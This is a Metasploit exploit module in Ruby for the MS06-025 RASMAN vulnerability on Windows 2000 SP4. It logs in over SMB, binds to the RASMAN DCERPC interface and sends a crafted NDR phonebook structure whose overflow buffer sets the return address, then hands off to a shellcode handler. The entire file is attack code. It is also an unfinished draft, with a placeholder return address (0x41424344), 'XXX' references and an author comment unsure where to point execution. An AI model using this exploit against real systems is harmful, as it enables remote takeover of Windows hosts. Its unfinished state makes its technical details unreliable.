metasploit-framework/modules/exploits/windows/smb/ms06_025_rasmans_reg.rb

require 'msf/core'

module Msf

class Exploits::Windows::Smb::MS06_025_RASMANS_REG < Msf::Exploit::Remote

	include Exploit::Remote::DCERPC
	include Exploit::Remote::SMB

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Microsoft RASMAN MS06-025',
			'Description'    => %q{
			    RASMAN!
            },
			'Author'         => [ 'pusscat' ],
			'License'        => BSD_LICENSE,
			'Version'        => '$Revision: 0.1 $',
			'References'     =>
				[
					[ 'OSVDB', 'XXX'],
					[ 'CVE', 'XXX'],
					[ 'MSB', 'MS06-025'],

				],
			'Privileged'     => true,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread'
				},
			'Payload'        =>
				{
					'Space'    => 1024,
					'BadChars' => "\x00",       # \ / . : $ NULL
				},
			'Platform'       => 'win',
			'Targets'        => 
				[
					[ 'Windows 2000 SP4', { 'Ret' => 0x41424344 } ],  # 
				],
			'DefaultTarget' => 0))
		register_options(
			[       
				OptString.new('SMBPIPE', [ true,  "Rawr.", 'router']),
			], self.class)		
	end

	def exploit
		connect()
		smb_login()
		print_status("Trying target #{target.name}...")
		
		handle = dcerpc_handle('20610036-fa22-11cf-9823-00a0c911e5df', '1.0', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"])
		print_status("Binding to #{handle}")
		dcerpc_bind(handle)
		print_status("Bound to #{handle}")
        
        patt = "\xcc" * 886 + NDR.long(target.ret) + "AAAA" + "\xcc" * 178 
        # AAAA represents unreadable handle - cannot be a valid address
        # \xcc can be anything
        # EIP -> 0x41424344
        # Not sure where to point it though... ideas?
        
        type2 = 
			NDR.string( ("\xcc" *  1024) + "\x00" ) +
			NDR.string( (patt) + "\x00" ) +
			NDR.string( ("\xcc" *  4096) + "\x00" ) +
            NDR.long(4) +
            NDR.long(4) 
          
        type1 = 
            NDR.long(4) + # OperatorDial
            NDR.long(4) + # PreviewPhoneNumber
            NDR.long(4) + # UseLocation
            NDR.long(4) + # ShowLights
            NDR.long(4) + # ShowConnectStatus
            NDR.long(4) + # CloseOnDial
            NDR.long(4) + # AllowLogonPhonebookEdits
            NDR.long(4) + # AllowLogonLocationEdits
            NDR.long(4) + # SkipConnectComplete
            NDR.long(4) + # NewEntryWizard
            NDR.long(4) + # RedialAttempts
            NDR.long(4) + # RedialSeconds
            NDR.long(4) + # IdleHangUpSeconds
            NDR.long(4) + # RedialOnLinkFailure
            NDR.long(4) + # PopupOnTopWhenRedialing
            NDR.long(4) + # ExpandAutoDialQuery
            NDR.long(4) + # CallbackMode

            NDR.long(0x45) + type2 +        # Parsed by CallbackListFromRpc
            NDR.wstring("\x00" * 129) +
            NDR.long(4) +
            NDR.wstring("\x00" * 520) +
            NDR.wstring("\x00" * 520) +

            NDR.long(4) +
            NDR.long(4) +
            NDR.long(4) +
            NDR.long(4) +
            NDR.long(4) +
            NDR.long(4) +
            NDR.long(4) +
            NDR.long(4) +

            NDR.string("\x00" * 514) +
            
			NDR.long(4) + 
            NDR.long(4)  
        
		stubdata = type1 + NDR.long(4)
        print_status('Stub is ' + stubdata.length.to_s + ' bytes long.')
		

		begin
			print_status('One for the money...')
			response = dcerpc.call(0xA, stubdata)
			
			print_status('Two for the show...')
			response = dcerpc.call(0xA, stubdata)
			
			print_status('Three to get ready...')
			print_status('Go shellcode, GO!')
			
		rescue Rex::Proto::DCERPC::Exceptions::NoResponse
		end

		handler
		disconnect
	end

end
end